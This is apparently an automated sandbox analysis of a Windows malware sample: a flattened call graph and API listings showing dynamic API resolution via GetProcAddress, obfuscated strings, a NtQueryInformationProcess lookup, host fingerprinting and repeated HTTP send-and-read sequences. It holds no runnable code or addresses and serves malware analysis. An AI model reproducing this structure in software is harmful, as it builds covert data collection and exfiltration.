fb3e56 14342->14343 14344 fb45c0 2 API calls 14343->14344 14345 fb3e6f 14344->14345 14346 fb45c0 2 API calls 14345->14346 14347 fb3e88 14346->14347 14348 fb45c0 2 API calls 14347->14348 14349 fb3ea1 14348->14349 14350 fb45c0 2 API calls 14349->14350 14351 fb3eba 14350->14351 14352 fb45c0 2 API calls 14351->14352 14353 fb3ed3 14352->14353 14354 fb45c0 2 API calls 
14353->14354 14355 fb3eec 14354->14355 14356 fb45c0 2 API calls 14355->14356 14357 fb3f05 14356->14357 14358 fb45c0 2 API calls 14357->14358 14359 fb3f1e 14358->14359 14360 fb45c0 2 API calls 14359->14360 14361 fb3f37 14360->14361 14362 fb45c0 2 API calls 14361->14362 14363 fb3f50 14362->14363 14364 fb45c0 2 API calls 14363->14364 14365 fb3f69 14364->14365 14366 fb45c0 2 API calls 14365->14366 14367 fb3f82 14366->14367 14368 fb45c0 2 API calls 14367->14368 14369 fb3f9b 14368->14369 14370 fb45c0 2 API calls 14369->14370 14371 fb3fb4 14370->14371 14372 fb45c0 2 API calls 14371->14372 14373 fb3fcd 14372->14373 14374 fb45c0 2 API calls 14373->14374 14375 fb3fe6 14374->14375 14376 fb45c0 2 API calls 14375->14376 14377 fb3fff 14376->14377 14378 fb45c0 2 API calls 14377->14378 14379 fb4018 14378->14379 14380 fb45c0 2 API calls 14379->14380 14381 fb4031 14380->14381 14382 fb45c0 2 API calls 14381->14382 14383 fb404a 14382->14383 14384 fb45c0 2 API calls 14383->14384 14385 fb4063 14384->14385 14386 fb45c0 2 API calls 14385->14386 14387 fb407c 14386->14387 14388 fb45c0 2 API calls 14387->14388 14389 fb4095 14388->14389 14390 fb45c0 2 API calls 14389->14390 14391 fb40ae 14390->14391 14392 fb45c0 2 API calls 14391->14392 14393 fb40c7 14392->14393 14394 fb45c0 2 API calls 14393->14394 14395 fb40e0 14394->14395 14396 fb45c0 2 API calls 14395->14396 14397 fb40f9 14396->14397 14398 fb45c0 2 API calls 14397->14398 14399 fb4112 14398->14399 14400 fb45c0 2 API calls 14399->14400 14401 fb412b 14400->14401 14402 fb45c0 2 API calls 14401->14402 14403 fb4144 14402->14403 14404 fb45c0 2 API calls 14403->14404 14405 fb415d 14404->14405 14406 fb45c0 2 API calls 14405->14406 14407 fb4176 14406->14407 14408 fb45c0 2 API calls 14407->14408 14409 fb418f 14408->14409 14410 fb45c0 2 API calls 14409->14410 14411 fb41a8 14410->14411 14412 fb45c0 2 API calls 14411->14412 14413 fb41c1 14412->14413 14414 fb45c0 2 API calls 14413->14414 14415 fb41da 14414->14415 14416 fb45c0 2 API calls 14415->14416 
14417 fb41f3 14416->14417 14418 fb45c0 2 API calls 14417->14418 14419 fb420c 14418->14419 14420 fb45c0 2 API calls 14419->14420 14421 fb4225 14420->14421 14422 fb45c0 2 API calls 14421->14422 14423 fb423e 14422->14423 14424 fb45c0 2 API calls 14423->14424 14425 fb4257 14424->14425 14426 fb45c0 2 API calls 14425->14426 14427 fb4270 14426->14427 14428 fb45c0 2 API calls 14427->14428 14429 fb4289 14428->14429 14430 fb45c0 2 API calls 14429->14430 14431 fb42a2 14430->14431 14432 fb45c0 2 API calls 14431->14432 14433 fb42bb 14432->14433 14434 fb45c0 2 API calls 14433->14434 14435 fb42d4 14434->14435 14436 fb45c0 2 API calls 14435->14436 14437 fb42ed 14436->14437 14438 fb45c0 2 API calls 14437->14438 14439 fb4306 14438->14439 14440 fb45c0 2 API calls 14439->14440 14441 fb431f 14440->14441 14442 fb45c0 2 API calls 14441->14442 14443 fb4338 14442->14443 14444 fb45c0 2 API calls 14443->14444 14445 fb4351 14444->14445 14446 fb45c0 2 API calls 14445->14446 14447 fb436a 14446->14447 14448 fb45c0 2 API calls 14447->14448 14449 fb4383 14448->14449 14450 fb45c0 2 API calls 14449->14450 14451 fb439c 14450->14451 14452 fb45c0 2 API calls 14451->14452 14453 fb43b5 14452->14453 14454 fb45c0 2 API calls 14453->14454 14455 fb43ce 14454->14455 14456 fb45c0 2 API calls 14455->14456 14457 fb43e7 14456->14457 14458 fb45c0 2 API calls 14457->14458 14459 fb4400 14458->14459 14460 fb45c0 2 API calls 14459->14460 14461 fb4419 14460->14461 14462 fb45c0 2 API calls 14461->14462 14463 fb4432 14462->14463 14464 fb45c0 2 API calls 14463->14464 14465 fb444b 14464->14465 14466 fb45c0 2 API calls 14465->14466 14467 fb4464 14466->14467 14468 fb45c0 2 API calls 14467->14468 14469 fb447d 14468->14469 14470 fb45c0 2 API calls 14469->14470 14471 fb4496 14470->14471 14472 fb45c0 2 API calls 14471->14472 14473 fb44af 14472->14473 14474 fb45c0 2 API calls 14473->14474 14475 fb44c8 14474->14475 14476 fb45c0 2 API calls 14475->14476 14477 fb44e1 14476->14477 14478 fb45c0 2 API calls 14477->14478 14479 fb44fa 
14478->14479 14480 fb45c0 2 API calls 14479->14480 14481 fb4513 14480->14481 14482 fb45c0 2 API calls 14481->14482 14483 fb452c 14482->14483 14484 fb45c0 2 API calls 14483->14484 14485 fb4545 14484->14485 14486 fb45c0 2 API calls 14485->14486 14487 fb455e 14486->14487 14488 fb45c0 2 API calls 14487->14488 14489 fb4577 14488->14489 14490 fb45c0 2 API calls 14489->14490 14491 fb4590 14490->14491 14492 fb45c0 2 API calls 14491->14492 14493 fb45a9 14492->14493 14494 fc9c10 14493->14494 14495 fca036 8 API calls 14494->14495 14496 fc9c20 43 API calls 14494->14496 14497 fca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14495->14497 14498 fca146 14495->14498 14496->14495 14497->14498 14499 fca216 14498->14499 14500 fca153 8 API calls 14498->14500 14501 fca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14501 14502 fca298 14499->14502 14500->14499 14501->14502 14503 fca2a5 6 API calls 14502->14503 14504 fca337 14502->14504 14503->14504 14505 fca41f 14504->14505 14506 fca344 9 API calls 14504->14506 14507 fca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14507 14508 fca4a2 14505->14508 14506->14505 14507->14508 14509 fca4dc 14508->14509 14510 fca4ab GetProcAddress GetProcAddress 14508->14510 14511 fca515 14509->14511 14512 fca4e5 GetProcAddress GetProcAddress 14509->14512 14510->14509 14513 fca612 14511->14513 14514 fca522 10 API calls 14511->14514 14512->14511 14515 fca67d 14513->14515 14516 fca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14516 14514->14513 14517 fca69e 14515->14517 14518 fca686 GetProcAddress 14515->14518 14516->14515 14519 fc5ca3 14517->14519 14520 fca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14520 14518->14517 14521 fb1590 14519->14521 14520->14519 15642 fb1670 14521->15642 14524 fca7a0 lstrcpy 14525 fb15b5 14524->14525 14526 fca7a0 lstrcpy 14525->14526 14527 fb15c7 14526->14527 14528 fca7a0 
lstrcpy 14527->14528 14529 fb15d9 14528->14529 14530 fca7a0 lstrcpy 14529->14530 14531 fb1663 14530->14531 14532 fc5510 14531->14532 14533 fc5521 14532->14533 14534 fca820 2 API calls 14533->14534 14535 fc552e 14534->14535 14536 fca820 2 API calls 14535->14536 14537 fc553b 14536->14537 14538 fca820 2 API calls 14537->14538 14539 fc5548 14538->14539 14540 fca740 lstrcpy 14539->14540 14541 fc5555 14540->14541 14542 fca740 lstrcpy 14541->14542 14543 fc5562 14542->14543 14544 fca740 lstrcpy 14543->14544 14545 fc556f 14544->14545 14546 fca740 lstrcpy 14545->14546 14571 fc557c 14546->14571 14547 fb1590 lstrcpy 14547->14571 14548 fc52c0 25 API calls 14548->14571 14549 fc51f0 20 API calls 14549->14571 14550 fc5643 StrCmpCA 14550->14571 14551 fc56a0 StrCmpCA 14552 fc57dc 14551->14552 14551->14571 14553 fca8a0 lstrcpy 14552->14553 14554 fc57e8 14553->14554 14555 fca820 2 API calls 14554->14555 14557 fc57f6 14555->14557 14556 fca820 lstrlen lstrcpy 14556->14571 14559 fca820 2 API calls 14557->14559 14558 fc5856 StrCmpCA 14560 fc5991 14558->14560 14558->14571 14564 fc5805 14559->14564 14563 fca8a0 lstrcpy 14560->14563 14561 fca740 lstrcpy 14561->14571 14562 fca8a0 lstrcpy 14562->14571 14565 fc599d 14563->14565 14566 fb1670 lstrcpy 14564->14566 14567 fca820 2 API calls 14565->14567 14568 fc5811 14566->14568 14569 fc59ab 14567->14569 14568->13639 14572 fca820 2 API calls 14569->14572 14570 fc5a0b StrCmpCA 14573 fc5a28 14570->14573 14574 fc5a16 Sleep 14570->14574 14571->14547 14571->14548 14571->14549 14571->14550 14571->14551 14571->14556 14571->14558 14571->14561 14571->14562 14571->14570 14583 fc578a StrCmpCA 14571->14583 14585 fc593f StrCmpCA 14571->14585 14586 fca7a0 lstrcpy 14571->14586 14575 fc59ba 14572->14575 14576 fca8a0 lstrcpy 14573->14576 14574->14571 14578 fb1670 lstrcpy 14575->14578 14577 fc5a34 14576->14577 14579 fca820 2 API calls 14577->14579 14578->14568 14580 fc5a43 14579->14580 14581 fca820 2 API calls 14580->14581 14582 fc5a52 14581->14582 14584 fb1670 
lstrcpy 14582->14584 14583->14571 14584->14568 14585->14571 14586->14571 14588 fc754c 14587->14588 14589 fc7553 GetVolumeInformationA 14587->14589 14588->14589 14590 fc7591 14589->14590 14591 fc75fc GetProcessHeap RtlAllocateHeap 14590->14591 14592 fc7628 wsprintfA 14591->14592 14593 fc7619 14591->14593 14595 fca740 lstrcpy 14592->14595 14594 fca740 lstrcpy 14593->14594 14596 fc5da7 14594->14596 14595->14596 14596->13660 14598 fca7a0 lstrcpy 14597->14598 14599 fb4899 14598->14599 15651 fb47b0 14599->15651 14601 fb48a5 14602 fca740 lstrcpy 14601->14602 14603 fb48d7 14602->14603 14604 fca740 lstrcpy 14603->14604 14605 fb48e4 14604->14605 14606 fca740 lstrcpy 14605->14606 14607 fb48f1 14606->14607 14608 fca740 lstrcpy 14607->14608 14609 fb48fe 14608->14609 14610 fca740 lstrcpy 14609->14610 14611 fb490b InternetOpenA StrCmpCA 14610->14611 14612 fb4944 14611->14612 14613 fb4ecb InternetCloseHandle 14612->14613 15657 fc8b60 14612->15657 14615 fb4ee8 14613->14615 15672 fb9ac0 CryptStringToBinaryA 14615->15672 14616 fb4963 15665 fca920 14616->15665 14619 fb4976 14621 fca8a0 lstrcpy 14619->14621 14627 fb497f 14621->14627 14622 fca820 2 API calls 14623 fb4f05 14622->14623 14624 fca9b0 4 API calls 14623->14624 14626 fb4f1b 14624->14626 14625 fb4f27 codecvt 14629 fca7a0 lstrcpy 14625->14629 14628 fca8a0 lstrcpy 14626->14628 14630 fca9b0 4 API calls 14627->14630 14628->14625 14642 fb4f57 14629->14642 14631 fb49a9 14630->14631 14632 fca8a0 lstrcpy 14631->14632 14633 fb49b2 14632->14633 14634 fca9b0 4 API calls 14633->14634 14635 fb49d1 14634->14635 14636 fca8a0 lstrcpy 14635->14636 14637 fb49da 14636->14637 14638 fca920 3 API calls 14637->14638 14639 fb49f8 14638->14639 14640 fca8a0 lstrcpy 14639->14640 14641 fb4a01 14640->14641 14643 fca9b0 4 API calls 14641->14643 14642->13663 14644 fb4a20 14643->14644 14645 fca8a0 lstrcpy 14644->14645 14646 fb4a29 14645->14646 14647 fca9b0 4 API calls 14646->14647 14648 fb4a48 14647->14648 14649 fca8a0 lstrcpy 14648->14649 14650 fb4a51 
14649->14650 14651 fca9b0 4 API calls 14650->14651 14652 fb4a7d 14651->14652 14653 fca920 3 API calls 14652->14653 14654 fb4a84 14653->14654 14655 fca8a0 lstrcpy 14654->14655 14656 fb4a8d 14655->14656 14657 fb4aa3 InternetConnectA 14656->14657 14657->14613 14658 fb4ad3 HttpOpenRequestA 14657->14658 14660 fb4b28 14658->14660 14661 fb4ebe InternetCloseHandle 14658->14661 14662 fca9b0 4 API calls 14660->14662 14661->14613 14663 fb4b3c 14662->14663 14664 fca8a0 lstrcpy 14663->14664 14665 fb4b45 14664->14665 14666 fca920 3 API calls 14665->14666 14667 fb4b63 14666->14667 14668 fca8a0 lstrcpy 14667->14668 14669 fb4b6c 14668->14669 14670 fca9b0 4 API calls 14669->14670 14671 fb4b8b 14670->14671 14672 fca8a0 lstrcpy 14671->14672 14673 fb4b94 14672->14673 14674 fca9b0 4 API calls 14673->14674 14675 fb4bb5 14674->14675 14676 fca8a0 lstrcpy 14675->14676 14677 fb4bbe 14676->14677 14678 fca9b0 4 API calls 14677->14678 14679 fb4bde 14678->14679 14680 fca8a0 lstrcpy 14679->14680 14681 fb4be7 14680->14681 14682 fca9b0 4 API calls 14681->14682 14683 fb4c06 14682->14683 14684 fca8a0 lstrcpy 14683->14684 14685 fb4c0f 14684->14685 14686 fca920 3 API calls 14685->14686 14687 fb4c2d 14686->14687 14688 fca8a0 lstrcpy 14687->14688 14689 fb4c36 14688->14689 14690 fca9b0 4 API calls 14689->14690 14691 fb4c55 14690->14691 14692 fca8a0 lstrcpy 14691->14692 14693 fb4c5e 14692->14693 14694 fca9b0 4 API calls 14693->14694 14695 fb4c7d 14694->14695 14696 fca8a0 lstrcpy 14695->14696 14697 fb4c86 14696->14697 14698 fca920 3 API calls 14697->14698 14699 fb4ca4 14698->14699 14700 fca8a0 lstrcpy 14699->14700 14701 fb4cad 14700->14701 14702 fca9b0 4 API calls 14701->14702 14703 fb4ccc 14702->14703 14704 fca8a0 lstrcpy 14703->14704 14705 fb4cd5 14704->14705 14706 fca9b0 4 API calls 14705->14706 14707 fb4cf6 14706->14707 14708 fca8a0 lstrcpy 14707->14708 14709 fb4cff 14708->14709 14710 fca9b0 4 API calls 14709->14710 14711 fb4d1f 14710->14711 14712 fca8a0 lstrcpy 14711->14712 14713 fb4d28 14712->14713 
14714 fca9b0 4 API calls 14713->14714 14715 fb4d47 14714->14715 14716 fca8a0 lstrcpy 14715->14716 14717 fb4d50 14716->14717 14718 fca920 3 API calls 14717->14718 14719 fb4d6e 14718->14719 14720 fca8a0 lstrcpy 14719->14720 14721 fb4d77 14720->14721 14722 fca740 lstrcpy 14721->14722 14723 fb4d92 14722->14723 14724 fca920 3 API calls 14723->14724 14725 fb4db3 14724->14725 14726 fca920 3 API calls 14725->14726 14727 fb4dba 14726->14727 14728 fca8a0 lstrcpy 14727->14728 14729 fb4dc6 14728->14729 14730 fb4de7 lstrlen 14729->14730 14731 fb4dfa 14730->14731 14732 fb4e03 lstrlen 14731->14732 15671 fcaad0 14732->15671 14734 fb4e13 HttpSendRequestA 14735 fb4e32 InternetReadFile 14734->14735 14736 fb4e67 InternetCloseHandle 14735->14736 14741 fb4e5e 14735->14741 14739 fca800 14736->14739 14738 fca9b0 4 API calls 14738->14741 14739->14661 14740 fca8a0 lstrcpy 14740->14741 14741->14735 14741->14736 14741->14738 14741->14740 15678 fcaad0 14742->15678 14744 fc17c4 StrCmpCA 14745 fc17cf ExitProcess 14744->14745 14746 fc17d7 14744->14746 14747 fc19c2 14746->14747 14748 fc185d StrCmpCA 14746->14748 14749 fc187f StrCmpCA 14746->14749 14750 fc1970 StrCmpCA 14746->14750 14751 fc18f1 StrCmpCA 14746->14751 14752 fc1951 StrCmpCA 14746->14752 14753 fc1932 StrCmpCA 14746->14753 14754 fc1913 StrCmpCA 14746->14754 14755 fc18ad StrCmpCA 14746->14755 14756 fc18cf StrCmpCA 14746->14756 14757 fca820 lstrlen lstrcpy 14746->14757 14747->13665 14748->14746 14749->14746 14750->14746 14751->14746 14752->14746 14753->14746 14754->14746 14755->14746 14756->14746 14757->14746 14759 fca7a0 lstrcpy 14758->14759 14760 fb5979 14759->14760 14761 fb47b0 2 API calls 14760->14761 14762 fb5985 14761->14762 14763 fca740 lstrcpy 14762->14763 14764 fb59ba 14763->14764 14765 fca740 lstrcpy 14764->14765 14766 fb59c7 14765->14766 14767 fca740 lstrcpy 14766->14767 14768 fb59d4 14767->14768 14769 fca740 lstrcpy 14768->14769 14770 fb59e1 14769->14770 14771 fca740 lstrcpy 14770->14771 14772 fb59ee InternetOpenA StrCmpCA 
14771->14772 14773 fb5a1d 14772->14773 14774 fb5fc3 InternetCloseHandle 14773->14774 14775 fc8b60 3 API calls 14773->14775 14776 fb5fe0 14774->14776 14777 fb5a3c 14775->14777 14779 fb9ac0 4 API calls 14776->14779 14778 fca920 3 API calls 14777->14778 14780 fb5a4f 14778->14780 14781 fb5fe6 14779->14781 14782 fca8a0 lstrcpy 14780->14782 14783 fca820 2 API calls 14781->14783 14786 fb601f codecvt 14781->14786 14788 fb5a58 14782->14788 14784 fb5ffd 14783->14784 14785 fca9b0 4 API calls 14784->14785 14787 fb6013 14785->14787 14790 fca7a0 lstrcpy 14786->14790 14789 fca8a0 lstrcpy 14787->14789 14791 fca9b0 4 API calls 14788->14791 14789->14786 14799 fb604f 14790->14799 14792 fb5a82 14791->14792 14793 fca8a0 lstrcpy 14792->14793 14794 fb5a8b 14793->14794 14795 fca9b0 4 API calls 14794->14795 14796 fb5aaa 14795->14796 14797 fca8a0 lstrcpy 14796->14797 14798 fb5ab3 14797->14798 14800 fca920 3 API calls 14798->14800 14799->13671 14801 fb5ad1 14800->14801 14802 fca8a0 lstrcpy 14801->14802 14803 fb5ada 14802->14803 14804 fca9b0 4 API calls 14803->14804 14805 fb5af9 14804->14805 14806 fca8a0 lstrcpy 14805->14806 14807 fb5b02 14806->14807 14808 fca9b0 4 API calls 14807->14808 14809 fb5b21 14808->14809 14810 fca8a0 lstrcpy 14809->14810 14811 fb5b2a 14810->14811 14812 fca9b0 4 API calls 14811->14812 14813 fb5b56 14812->14813 14814 fca920 3 API calls 14813->14814 14815 fb5b5d 14814->14815 14816 fca8a0 lstrcpy 14815->14816 14817 fb5b66 14816->14817 14818 fb5b7c InternetConnectA 14817->14818 14818->14774 14819 fb5bac HttpOpenRequestA 14818->14819 14821 fb5c0b 14819->14821 14822 fb5fb6 InternetCloseHandle 14819->14822 14823 fca9b0 4 API calls 14821->14823 14822->14774 14824 fb5c1f 14823->14824 14825 fca8a0 lstrcpy 14824->14825 14826 fb5c28 14825->14826 14827 fca920 3 API calls 14826->14827 14828 fb5c46 14827->14828 14829 fca8a0 lstrcpy 14828->14829 14830 fb5c4f 14829->14830 14831 fca9b0 4 API calls 14830->14831 14832 fb5c6e 14831->14832 14833 fca8a0 lstrcpy 14832->14833 14834 fb5c77 
14833->14834 14835 fca9b0 4 API calls 14834->14835 14836 fb5c98 14835->14836 14837 fca8a0 lstrcpy 14836->14837 14838 fb5ca1 14837->14838 14839 fca9b0 4 API calls 14838->14839 14840 fb5cc1 14839->14840 14841 fca8a0 lstrcpy 14840->14841 14842 fb5cca 14841->14842 14843 fca9b0 4 API calls 14842->14843 14844 fb5ce9 14843->14844 14845 fca8a0 lstrcpy 14844->14845 14846 fb5cf2 14845->14846 14847 fca920 3 API calls 14846->14847 14848 fb5d10 14847->14848 14849 fca8a0 lstrcpy 14848->14849 14850 fb5d19 14849->14850 14851 fca9b0 4 API calls 14850->14851 14852 fb5d38 14851->14852 14853 fca8a0 lstrcpy 14852->14853 14854 fb5d41 14853->14854 14855 fca9b0 4 API calls 14854->14855 14856 fb5d60 14855->14856 14857 fca8a0 lstrcpy 14856->14857 14858 fb5d69 14857->14858 14859 fca920 3 API calls 14858->14859 14860 fb5d87 14859->14860 14861 fca8a0 lstrcpy 14860->14861 14862 fb5d90 14861->14862 14863 fca9b0 4 API calls 14862->14863 14864 fb5daf 14863->14864 14865 fca8a0 lstrcpy 14864->14865 14866 fb5db8 14865->14866 14867 fca9b0 4 API calls 14866->14867 14868 fb5dd9 14867->14868 14869 fca8a0 lstrcpy 14868->14869 14870 fb5de2 14869->14870 14871 fca9b0 4 API calls 14870->14871 14872 fb5e02 14871->14872 14873 fca8a0 lstrcpy 14872->14873 14874 fb5e0b 14873->14874 14875 fca9b0 4 API calls 14874->14875 14876 fb5e2a 14875->14876 14877 fca8a0 lstrcpy 14876->14877 14878 fb5e33 14877->14878 14879 fca920 3 API calls 14878->14879 14880 fb5e54 14879->14880 14881 fca8a0 lstrcpy 14880->14881 14882 fb5e5d 14881->14882 14883 fb5e70 lstrlen 14882->14883 15679 fcaad0 14883->15679 14885 fb5e81 lstrlen GetProcessHeap RtlAllocateHeap 15680 fcaad0 14885->15680 14887 fb5eae lstrlen 14888 fb5ebe 14887->14888 14889 fb5ed7 lstrlen 14888->14889 14890 fb5ee7 14889->14890 14891 fb5ef0 lstrlen 14890->14891 14892 fb5f04 14891->14892 14893 fb5f1a lstrlen 14892->14893 15681 fcaad0 14893->15681 14895 fb5f2a HttpSendRequestA 14896 fb5f35 InternetReadFile 14895->14896 14897 fb5f6a InternetCloseHandle 14896->14897 14901 fb5f61 
14896->14901 14897->14822 14899 fca9b0 4 API calls 14899->14901 14900 fca8a0 lstrcpy 14900->14901 14901->14896 14901->14897 14901->14899 14901->14900 14903 fc1077 14902->14903 14904 fc1151 14903->14904 14905 fca820 lstrlen lstrcpy 14903->14905 14904->13673 14905->14903 14907 fc0db7 14906->14907 14908 fc0f17 14907->14908 14909 fc0ea4 StrCmpCA 14907->14909 14910 fc0e27 StrCmpCA 14907->14910 14911 fc0e67 StrCmpCA 14907->14911 14912 fca820 lstrlen lstrcpy 14907->14912 14908->13681 14909->14907 14910->14907 14911->14907 14912->14907 14914 fc0f67 14913->14914 14915 fc0fb2 StrCmpCA 14914->14915 14916 fc1044 14914->14916 14917 fca820 lstrlen lstrcpy 14914->14917 14915->14914 14916->13689 14917->14914 14919 fca740 lstrcpy 14918->14919 14920 fc1a26 14919->14920 14921 fca9b0 4 API calls 14920->14921 14922 fc1a37 14921->14922 14923 fca8a0 lstrcpy 14922->14923 14924 fc1a40 14923->14924 14925 fca9b0 4 API calls 14924->14925 14926 fc1a5b 14925->14926 14927 fca8a0 lstrcpy 14926->14927 14928 fc1a64 14927->14928 14929 fca9b0 4 API calls 14928->14929 14930 fc1a7d 14929->14930 14931 fca8a0 lstrcpy 14930->14931 14932 fc1a86 14931->14932 14933 fca9b0 4 API calls 14932->14933 14934 fc1aa1 14933->14934 14935 fca8a0 lstrcpy 14934->14935 14936 fc1aaa 14935->14936 14937 fca9b0 4 API calls 14936->14937 14938 fc1ac3 14937->14938 14939 fca8a0 lstrcpy 14938->14939 14940 fc1acc 14939->14940 14941 fca9b0 4 API calls 14940->14941 14942 fc1ae7 14941->14942 14943 fca8a0 lstrcpy 14942->14943 14944 fc1af0 14943->14944 14945 fca9b0 4 API calls 14944->14945 14946 fc1b09 14945->14946 14947 fca8a0 lstrcpy 14946->14947 14948 fc1b12 14947->14948 14949 fca9b0 4 API calls 14948->14949 14950 fc1b2d 14949->14950 14951 fca8a0 lstrcpy 14950->14951 14952 fc1b36 14951->14952 14953 fca9b0 4 API calls 14952->14953 14954 fc1b4f 14953->14954 14955 fca8a0 lstrcpy 14954->14955 14956 fc1b58 14955->14956 14957 fca9b0 4 API calls 14956->14957 14958 fc1b76 14957->14958 14959 fca8a0 lstrcpy 14958->14959 14960 fc1b7f 
14959->14960 14961 fc7500 6 API calls 14960->14961 14962 fc1b96 14961->14962 14963 fca920 3 API calls 14962->14963 14964 fc1ba9 14963->14964 14965 fca8a0 lstrcpy 14964->14965 14966 fc1bb2 14965->14966 14967 fca9b0 4 API calls 14966->14967 14968 fc1bdc 14967->14968 14969 fca8a0 lstrcpy 14968->14969 14970 fc1be5 14969->14970 14971 fca9b0 4 API calls 14970->14971 14972 fc1c05 14971->14972 14973 fca8a0 lstrcpy 14972->14973 14974 fc1c0e 14973->14974 15682 fc7690 GetProcessHeap RtlAllocateHeap 14974->15682 14977 fca9b0 4 API calls 14978 fc1c2e 14977->14978 14979 fca8a0 lstrcpy 14978->14979 14980 fc1c37 14979->14980 14981 fca9b0 4 API calls 14980->14981 14982 fc1c56 14981->14982 14983 fca8a0 lstrcpy 14982->14983 14984 fc1c5f 14983->14984 14985 fca9b0 4 API calls 14984->14985 14986 fc1c80 14985->14986 14987 fca8a0 lstrcpy 14986->14987 14988 fc1c89 14987->14988 15689 fc77c0 GetCurrentProcess IsWow64Process 14988->15689 14991 fca9b0 4 API calls 14992 fc1ca9 14991->14992 14993 fca8a0 lstrcpy 14992->14993 14994 fc1cb2 14993->14994 14995 fca9b0 4 API calls 14994->14995 14996 fc1cd1 14995->14996 14997 fca8a0 lstrcpy 14996->14997 14998 fc1cda 14997->14998 14999 fca9b0 4 API calls 14998->14999 15000 fc1cfb 14999->15000 15001 fca8a0 lstrcpy 15000->15001 15002 fc1d04 15001->15002 15003 fc7850 3 API calls 15002->15003 15004 fc1d14 15003->15004 15005 fca9b0 4 API calls 15004->15005 15006 fc1d24 15005->15006 15007 fca8a0 lstrcpy 15006->15007 15008 fc1d2d 15007->15008 15009 fca9b0 4 API calls 15008->15009 15010 fc1d4c 15009->15010 15011 fca8a0 lstrcpy 15010->15011 15012 fc1d55 15011->15012 15013 fca9b0 4 API calls 15012->15013 15014 fc1d75 15013->15014 15015 fca8a0 lstrcpy 15014->15015 15016 fc1d7e 15015->15016 15017 fc78e0 3 API calls 15016->15017 15018 fc1d8e 15017->15018 15019 fca9b0 4 API calls 15018->15019 15020 fc1d9e 15019->15020 15021 fca8a0 lstrcpy 15020->15021 15022 fc1da7 15021->15022 15023 fca9b0 4 API calls 15022->15023 15024 fc1dc6 15023->15024 15025 fca8a0 lstrcpy 

                              Control-flow Graph (function fc9860-fc9bc2: call fc9750, GetProcAddress * 21, LoadLibraryA * 5; graph edge data omitted)
                              APIs
                              • GetProcAddress.KERNEL32(77190000,00DDDBB0), ref: 00FC98A1
                              • GetProcAddress.KERNEL32(77190000,00DDDBE0), ref: 00FC98BA
                              • GetProcAddress.KERNEL32(77190000,00DDDAA8), ref: 00FC98D2
                              • GetProcAddress.KERNEL32(77190000,00DE8C40), ref: 00FC98EA
                              • GetProcAddress.KERNEL32(77190000,00DE8CD0), ref: 00FC9903
                              • GetProcAddress.KERNEL32(77190000,00DE9168), ref: 00FC991B
                              • GetProcAddress.KERNEL32(77190000,00DD5FF0), ref: 00FC9933
                              • GetProcAddress.KERNEL32(77190000,00DD5FB0), ref: 00FC994C
                              • GetProcAddress.KERNEL32(77190000,00DE8CA0), ref: 00FC9964
                              • GetProcAddress.KERNEL32(77190000,00DE8D48), ref: 00FC997C
                              • GetProcAddress.KERNEL32(77190000,00DE8BC8), ref: 00FC9995
                              • GetProcAddress.KERNEL32(77190000,00DE8C10), ref: 00FC99AD
                              • GetProcAddress.KERNEL32(77190000,00DD6130), ref: 00FC99C5
                              • GetProcAddress.KERNEL32(77190000,00DE8BE0), ref: 00FC99DE
                              • GetProcAddress.KERNEL32(77190000,00DE8C58), ref: 00FC99F6
                              • GetProcAddress.KERNEL32(77190000,00DD5F50), ref: 00FC9A0E
                              • GetProcAddress.KERNEL32(77190000,00DE8D60), ref: 00FC9A27
                              • GetProcAddress.KERNEL32(77190000,00DE8C28), ref: 00FC9A3F
                              • GetProcAddress.KERNEL32(77190000,00DD6150), ref: 00FC9A57
                              • GetProcAddress.KERNEL32(77190000,00DE8D30), ref: 00FC9A70
                              • GetProcAddress.KERNEL32(77190000,00DD6170), ref: 00FC9A88
                              • LoadLibraryA.KERNEL32(00DE8CB8,?,00FC6A00), ref: 00FC9A9A
                              • LoadLibraryA.KERNEL32(00DE8B98,?,00FC6A00), ref: 00FC9AAB
                              • LoadLibraryA.KERNEL32(00DE8CE8,?,00FC6A00), ref: 00FC9ABD
                              • LoadLibraryA.KERNEL32(00DE8C70,?,00FC6A00), ref: 00FC9ACF
                              • LoadLibraryA.KERNEL32(00DE8BB0,?,00FC6A00), ref: 00FC9AE0
                              • GetProcAddress.KERNEL32(76850000,00DE8C88), ref: 00FC9B02
                              • GetProcAddress.KERNEL32(77040000,00DE8D00), ref: 00FC9B23
                              • GetProcAddress.KERNEL32(77040000,00DE8BF8), ref: 00FC9B3B
                              • GetProcAddress.KERNEL32(75A10000,00DE8D18), ref: 00FC9B5D
                              • GetProcAddress.KERNEL32(75690000,00DD60B0), ref: 00FC9B7E
                              • GetProcAddress.KERNEL32(776F0000,00DE9108), ref: 00FC9B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00FC9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00FC9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
